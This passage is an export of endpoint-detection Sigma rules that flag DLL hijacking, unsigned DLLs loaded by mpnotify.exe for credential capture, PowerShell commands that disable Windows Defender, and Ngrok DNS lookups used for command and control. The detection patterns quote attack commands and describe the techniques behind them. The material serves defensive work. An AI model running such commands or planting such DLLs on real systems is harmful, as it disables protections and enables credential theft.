"rule_description": "Detects potential Windows DLL Hijacking via sysreseterr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d48fb6b0-3f98-4577-95fe-48d2b1ed297d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093816Z",
"creation_date": "2026-03-23T11:45:34.093818Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093823Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
"https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nppasswordchangenotify",
"https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_mpnotify_load_unsigned_dll.yml",
"content": "title: Unsigned DLL Loaded by mpnotify.exe\nid: d48fb6b0-3f98-4577-95fe-48d2b1ed297d\ndescription: |\n Detects when an unsigned DLL is loaded by mpnotify.exe.\n This can be used by an attacker to receive notifications from winlogon.exe when a user logs in or changes password.\n Using a malicious DLL, an attacker can get access to clear text credentials.\n It is recommended to investigate the origin of the loaded DLL and to disable compromised accounts.\nreferences:\n - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy\n - https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nppasswordchangenotify\n - https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify\n - https://attack.mitre.org/techniques/T1003/\ndate: 2021/03/18\nmodified: 2025/07/31\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1078\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\mpnotify.exe'\n filter_signed:\n Signed: 'true'\n exclusion_mpnotify:\n ImageLoaded: '?:\\Windows\\System32\\mpnotify.exe'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'mpnotify.exe'\n\n exclusion_winsxs:\n # C:\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_88dcc0bf2fb1b808\\msvcr80.dll\n # C:\\Windows\\WinSxS\\amd64_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_bc20f59b0bdd1acd\\mfc80FRA.dll\n # C:\\Windows\\WinSxS\\amd64_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_bc20f59b0bdd1acd\\mfc80ENU.dll\n # C:\\Windows\\WinSxS\\amd64_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_8448b2bd328df189\\mfc80u.dll\n # msvcr80.DLL is signed via catalogue.\n ImageLoaded:\n - '?:\\Windows\\winsxs\\amd64_microsoft.vc80.crt_*\\msvcr80.dll'\n # If we end up finding a 32 bits variant that is also unsigned, uncomment this.\n # - '?:\\windows\\winsxs\\x86_microsoft.vc80.crt_*\\msvcr80.dll'\n - '?:\\Windows\\winsxs\\amd64_microsoft.vc80.mfcloc_*\\mfc80???.dll' # mfc80ENU.dll / mfc80FRA.dll\n - '?:\\Windows\\WinSxS\\Fusion\\amd64_microsoft.vc80.mfc*\\mfc80*.dll' # mfc80FRA.dll / mfc80u.dll\n - '?:\\Windows\\winsxs\\amd64_microsoft.vc80.mfc_*\\mfc80u.dll'\n - '?:\\Windows\\winsxs\\amd64_microsoft.vc80.crt_*\\msvcp80.dll'\n - '?:\\Windows\\winsxs\\amd64_microsoft.vc90.crt_*\\msvcm90.dll'\n - '?:\\Windows\\WinSxS\\amd64_microsoft.vc80.atl_*\\ATL80.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName:\n - 'MSVCR80.DLL'\n - 'MFC80FRA.DLL'\n - 'MFC80ENU.DLL'\n - 'MFC80U.DLL'\n - 'MSVCP80.DLL'\n - 'MSVCM90.DLL'\n - 'ATL80.DLL'\n\n exclusion_ibm:\n Company: 'IBM Corporation'\n OriginalFileName:\n - 'cwbnetnt.dll' # C:\\Program Files (x86)\\IBM\\Client Access\\Shared\\cwbnetnt.dll\n - 'cwbunpls.dll' # C:\\Windows\\System32\\cwbunpls.dll\n - 'cwbcore.dll' # C:\\Windows\\System32\\cwbcore.dll\n\n exclusion_ibm_without_infos:\n # SHA-256: 5bef56d5a9196e4706f074e52f333bf357a67513a00a6882de33bfbfb77e3e1b\n ImageLoaded: '?:\\Windows\\System32\\cwbrw.dll'\n Company: ''\n Description: ''\n FileVersion: ''\n LegalCopyright: ''\n OriginalFileName: ''\n InternalName: ''\n\n # C:\\Lotus\\Notes\\npnotes64.dll\n exclusion_ibm_lotus:\n Company:\n - 'IBM Corporation'\n - 'Lotus Development'\n OriginalFileName: 'npnotes'\n\n exclusion_ibm_client_access_cwbcfmsg:\n # C:\\Program Files (x86)\\IBM\\Client Access\\Mri2928\\cwbcfmsg.dll\n # C:\\winu\\IBM\\Client Access\\MRI2966\\cwbcfmsg.dll\n # There is no PE information on this DLL...\n ImageLoaded: '*\\IBM\\Client Access\\Mri29??\\cwbcfmsg.dll'\n\n exclusion_NPPSpy:\n # This DLL is malicious so we have another sigma rule with higher level\n ImageLoaded: '?:\\Windows\\System32\\NPPSPY.dll'\n\n exclusion_mit_kerberos:\n ImageLoaded:\n - '?:\\Program Files\\MIT\\Kerberos\\bin\\krbcc64.dll'\n - '?:\\Program Files\\MIT\\Kerberos\\bin\\leashw64.dll'\n - '?:\\Program Files\\MIT\\Kerberos\\bin\\xpprof64.dll'\n - '?:\\Program Files\\MIT\\Kerberos\\bin\\krb5_64.dll'\n - '?:\\Program Files\\MIT\\Kerberos\\bin\\k5sprt64.dll'\n - '?:\\Program Files\\MIT\\Kerberos\\bin\\comerr64.dll'\n - '?:\\Program Files\\MIT\\Kerberos\\bin\\wshelp64.dll'\n - '?:\\Windows\\System32\\kfwlogon.dll'\n Company: 'Massachusetts Institute of Technology.'\n\n exclusion_ms:\n # Signed via catalogue\n ImageLoaded:\n - '?:\\Windows\\System32\\shfolder.dll'\n - '?:\\Windows\\System32\\comdlg32.dll'\n - '?:\\Windows\\System32\\uxtheme.dll'\n - '?:\\Windows\\System32\\oleaut32.dll'\n - '?:\\Windows\\System32\\lpk.dll'\n Company: 'Microsoft Corporation'\n\n exclusion_broadcom:\n ImageLoaded: '?:\\Windows\\System32\\BCMLogon.dll'\n Company:\n - 'Broadcom Corporation'\n - 'Dell Inc.'\n OriginalFileName: 'BCMLogon.dll'\n\n exclusion_dotnet:\n # C:\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\0478aed7fc25ae268474c704fd2a3e0f\\mscorlib.ni.dll\n ImageLoaded: '?:\\Windows\\assembly\\NativeImages_v2*\\mscorlib\\\\*\\mscorlib.ni.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'mscorlib.dll'\n\n exclusion_secur32:\n ImageLoaded: '?:\\Windows\\System32\\secur32.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'secur32.dll'\n\n exclusion_kernel32:\n # SHA256: 3887ddbbb00e9650c5c9494b9eb5799fe0a3ea7e4d9345e596736b43f70f94da\n ImageLoaded: '?:\\Windows\\System32\\kernel32.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'kernel32'\n\n exclusion_sechost:\n # SHA256: 8ebd0bf108c490c3fb0946210a6d63767d5797e374ee5cf5414fd803d3a23451\n ImageLoaded: '?:\\Windows\\System32\\sechost.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'sechost.dll'\n\n exclusion_rpcrt4:\n # SHA256: 207227b6d01c2da123981a6f836d8f3a1c11ee52d65d15cf9ec0f3c5478abfff\n ImageLoaded: '?:\\Windows\\System32\\rpcrt4.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'rpcrt4.dll'\n\n exclusion_advapi32:\n # SHA256: e09740d26a0c9723de55173134dbbeb663a34085297ab14d7aeacd2bd594e55b\n ImageLoaded: '?:\\Windows\\System32\\advapi32.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'advapi32.dll'\n\n exclusion_msvcrt:\n # SHA256: 6b668a5882b862601fbe4fb2489a3b553ffdacf6d0428241b15b52fd45b88e20\n ImageLoaded: '?:\\Windows\\System32\\advapi32.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'msvcrt.dll'\n\n exclusion_mpr:\n # SHA256: 0f7a80db821fde6580e9481b6da44844f717ddb4983b0e3d562be43726153951\n ImageLoaded: '?:\\Windows\\System32\\mpr.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'mpr.dll'\n\n exclusion_kernelbase:\n ImageLoaded: '?:\\Windows\\System32\\KernelBase.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'Kernelbase'\n\n exclusion_xerox:\n ImageLoaded: '?:\\Program Files\\Xerox\\DSClient\\CredMan.dll'\n Company: 'Xerox Corporation'\n OriginalFileName: 'CredMan.dll'\n\n exclusion_novell:\n ImageLoaded:\n - '?:\\Program Files\\Novell\\CASA\\Bin\\lcredmgr.dll'\n - '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\ZenCredManager.dll'\n\n exclusion_mcafee_enc_network_provider:\n Image: '?:\\Program Files\\Hewlett-Packard\\Drive Encryption\\EpePcNp64.dll'\n\n exclusion_rpc:\n ImageLoaded: '?:\\Windows\\System32\\RpcRtRemote.dll'\n\n exclusion_south_river_technologies:\n ImageLoaded:\n - '?:\\Windows\\System32\\wdHelper.dll'\n - '?:\\Windows\\System32\\wdResDll.dll'\n - '?:\\Windows\\System32\\wdUIResDll.dll'\n LegalCopyright|contains: 'South River Technologies, Inc.'\n\n exclusion_nvidia:\n ImageLoaded:\n - '?:\\Program Files\\NVIDIA Corporation\\coprocmanager\\nvd*.dll'\n - '?:\\Windows\\System32\\nvinitx.dll'\n Company: 'NVIDIA Corporation'\n Product: 'NVIDIA D3D shim drivers'\n\n exclusion_winspool:\n # SHA256: ad4569983410a1149ca200729766ff80eb2f342d27024d0fd90d3bf121ea1e69\n ImageLoaded: '?:\\Windows\\System32\\winspool.drv'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'winspool.drv'\n\n exclusion_dell_encryption:\n ImageLoaded|startswith: '?:\\Program Files\\Dell\\Dell Data Protection\\Encryption\\'\n Company|contains: 'The Security Division of EMC'\n OriginalFileName:\n - 'ccme_ecc_non_fips'\n - 'ccme_ecc_accel_non_fips'\n - 'ccme_base_non_fips'\n - 'ccme_ecc'\n - 'ccme_asym'\n - 'ccme_base'\n - 'ccme_aux_entropy'\n - 'ccme_error_info'\n - 'cryptocme'\n\n exclusion_openssl:\n - ImageLoaded:\n - '?:\\Windows\\System32\\libcrypto*.dll'\n - '?:\\Windows\\System32\\libssl*.dll'\n Company|startswith: 'The OpenSSL Project'\n - ImageLoaded: '?:\\Windows\\System32\\libeayX.dll'\n Company: 'The OpenSSL Project, http://www.openssl.org/'\n OriginalFileName: 'libeay32.dll'\n\n exclusion_sso_dell:\n ImageLoaded: '?:\\Windows\\System32\\pnsso.dll'\n Company: 'Dell Inc.'\n OriginalFileName: 'pnsso.dll'\n\n exclusion_sophos:\n ImageLoaded: '?:\\Windows\\System32\\hmpalert.dll'\n Company: 'Sophos Limited'\n OriginalFileName: 'hmpalert.dll'\n\n exclusion_wave:\n ImageLoaded: '?:\\Windows\\System32\\WCR10.dll'\n Company: 'Wave Systems Corp.'\n OriginalFileName: 'WCR10.dll'\n\n exclusion_dpapi:\n ImageLoaded: '?:\\Windows\\System32\\dpapi.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'dpapi.dll'\n\n exclusion_msctf:\n ImageLoaded: '?:\\Windows\\System32\\msctf.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'MSCTF.DLL'\n\n exclusion_version_ms:\n ImageLoaded: '?:\\Windows\\System32\\version.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'VERSION.DLL'\n\n exclusion_imm32:\n ImageLoaded: '?:\\Windows\\System32\\imm32.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'imm32'\n\n exclusion_crypt32:\n ImageLoaded: '?:\\Windows\\System32\\crypt32.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'CRYPT32.DLL'\n\n exclusion_cryptbase:\n ImageLoaded: '?:\\Windows\\System32\\cryptbase.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'cryptbase.dll'\n\n exclusion_msasn1:\n ImageLoaded: '?:\\Windows\\System32\\msasn1.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'msasn1.dll'\n\n exclusion_shell32:\n ImageLoaded: '?:\\Windows\\System32\\shell32.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'SHELL32.DLL'\n\n exclusion_avencis:\n ImageLoaded: '?:\\Program Files (x86)\\Avencis\\SSOX\\SSOXCredentialManager.dll'\n Company: 'Avencis'\n OriginalFileName: 'SSOXCredManager.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d48fb6b0-3f98-4577-95fe-48d2b1ed297d",
"rule_name": "Unsigned DLL Loaded by mpnotify.exe",
"rule_description": "Detects when an unsigned DLL is loaded by mpnotify.exe.\nThis can be used by an attacker to receive notifications from winlogon.exe when a user logs in or changes password.\nUsing a malicious DLL, an attacker can get access to clear text credentials.\nIt is recommended to investigate the origin of the loaded DLL and to disable compromised accounts.\n",
"rule_creation_date": "2021-03-18",
"rule_modified_date": "2025-07-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d4bcc870-f8ea-422b-a873-97ee79190440",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621697Z",
"creation_date": "2026-03-23T11:45:34.621699Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621703Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/",
"https://github.com/jeremybeaume/tools/blob/master/disable-defender.ps1",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_windows_defender_disable_powershell.yml",
"content": "title: Windows Defender Disabled via PowerShell\nid: d4bcc870-f8ea-422b-a873-97ee79190440\ndescription: |\n Detects the usage of PowerShell to disable Windows Defender.\n Attackers might disable Windows Defender to evade detection.\n It is recommended to investigate the PowerShell command and the parent process for suspicious activities.\nreferences:\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://github.com/jeremybeaume/tools/blob/master/disable-defender.ps1\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/08/24\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Set-MpPreference -DisableRealtimeMonitoring 1'\n - 'Set-MpPreference -DisableRealtimeMonitoring $true'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_image:\n ProcessParentImage:\n - '?:\\Program Files\\McAfee\\Endpoint Security\\Threat Prevention\\mfetp.exe'\n - '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n - '?:\\Program Files (x86)\\N-able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe'\n\n exclusion_bitdefender:\n ProcessParentSigned: 'true'\n ProcessParentImage|endswith: '\\Installer.exe'\n ProcessParentSignature: 'Bitdefender SRL'\n\n exclusion_brainlab:\n ProcessOriginalFileName: 'PackageManager.exe'\n ProcessSigned: 'true'\n ProcessParentSignature: 'Brainlab AG'\n\n exclusion_ccm:\n PowershellScriptPath|startswith:\n - '?:\\WINDOWS\\CCM\\'\n - '?:\\Windows\\ccmcache\\'\n ProcessParentCommandLine: '?:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding'\n ProcessGrandparentCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k DcomLaunch'\n - '?:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p'\n\n exclusion_update:\n ProcessImage: '?:\\Windows\\System32\\SIHClient.exe'\n ProcessParentImage: '?:\\Windows\\System32\\upfc.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d4bcc870-f8ea-422b-a873-97ee79190440",
"rule_name": "Windows Defender Disabled via PowerShell",
"rule_description": "Detects the usage of PowerShell to disable Windows Defender.\nAttackers might disable Windows Defender to evade detection.\nIt is recommended to investigate the PowerShell command and the parent process for suspicious activities.\n",
"rule_creation_date": "2023-08-24",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d4d6d0bc-c4fa-46f7-ab41-5e058ec48856",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076052Z",
"creation_date": "2026-03-23T11:45:34.076054Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076058Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fsiso.yml",
"content": "title: DLL Hijacking via fsiso.exe\nid: d4d6d0bc-c4fa-46f7-ab41-5e058ec48856\ndescription: |\n Detects potential Windows DLL Hijacking via fsiso.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fsiso.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\iumbase.DLL'\n - '\\iumsdk.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d4d6d0bc-c4fa-46f7-ab41-5e058ec48856",
"rule_name": "DLL Hijacking via fsiso.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fsiso.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d4e4630d-a0c6-49fe-b595-017d9905b55d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625319Z",
"creation_date": "2026-03-23T11:45:34.625321Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625325Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf",
"https://ngrok.com/blog-post/new-ngrok-domains",
"https://attack.mitre.org/techniques/T1102/002/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1102_002_dns_resolution_ngrok.yml",
"content": "title: DNS Resolution of Ngrok Service\nid: d4e4630d-a0c6-49fe-b595-017d9905b55d\ndescription: |\n Detects a DNS resolution request to Ngrok's services by utilizing free static domains provided by Ngrok.\n Adversaries may use an existing, legitimate external Web service like Ngrok as a means to sending commands to and receiving output from a compromised system over the Web service channel.\n It is recommended to investigate the process at the origin of the DNS resolution to determine whether the communication with Ngrok's services is legitimate.\nreferences:\n - https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf\n - https://ngrok.com/blog-post/new-ngrok-domains\n - https://attack.mitre.org/techniques/T1102/002/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/11/20\nmodified: 2025/12/19\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.t1071.001\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Tool.Ngrok\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName|endswith:\n - '.ngrok-free.app'\n - '.ngrok-free.dev'\n - '.ngrok.app'\n - '.ngrok.dev'\n - '.ngrok.io'\n\n filter_browser:\n ProcessOriginalFileName:\n - 'firefox.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'librewolf.exe'\n - 'opera.exe'\n - 'vivaldi.exe'\n - 'iexplore.exe'\n - 'msedgewebview2.exe'\n - 'zen.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_misc_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\wbem\\WmiApSrv.exe'\n - '?:\\Windows\\System32\\smartscreen.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_mcafee:\n ProcessImage|endswith: '\\mfeatp.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'MUSARUBRA US LLC'\n\n exclusion_postman:\n ProcessImage|endswith: '\\Postman.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Postman, Inc.'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d4e4630d-a0c6-49fe-b595-017d9905b55d",
"rule_name": "DNS Resolution of Ngrok Service",
"rule_description": "Detects a DNS resolution request to Ngrok's services by utilizing free static domains provided by Ngrok.\nAdversaries may use an existing, legitimate external Web service like Ngrok as a means to sending commands to and receiving output from a compromised system over the Web service channel.\nIt is recommended to investigate the process at the origin of the DNS resolution to determine whether the communication with Ngrok's services is legitimate.\n",
"rule_creation_date": "2023-11-20",
"rule_modified_date": "2025-12-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d4f15ea4-71e4-4670-8baf-2801a6e000e1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
